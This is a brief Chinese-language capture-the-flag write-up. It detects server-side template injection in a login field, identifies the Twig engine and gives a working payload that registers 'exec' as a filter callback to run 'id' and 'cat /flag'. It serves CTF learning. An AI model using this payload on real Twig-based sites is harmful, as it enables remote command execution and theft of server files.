首先这题flag模块有个登录页面
抓包
可以看到user=123,最后会返回hello 123,这里就很像ssti注入,输入user={{2*3}}
最后也是返回成功了,而且处理器是php,常见模块有:twig,smarty,blade
输入 user={{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
这里可以断定,是twig模块,直接上payload:
user={{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}}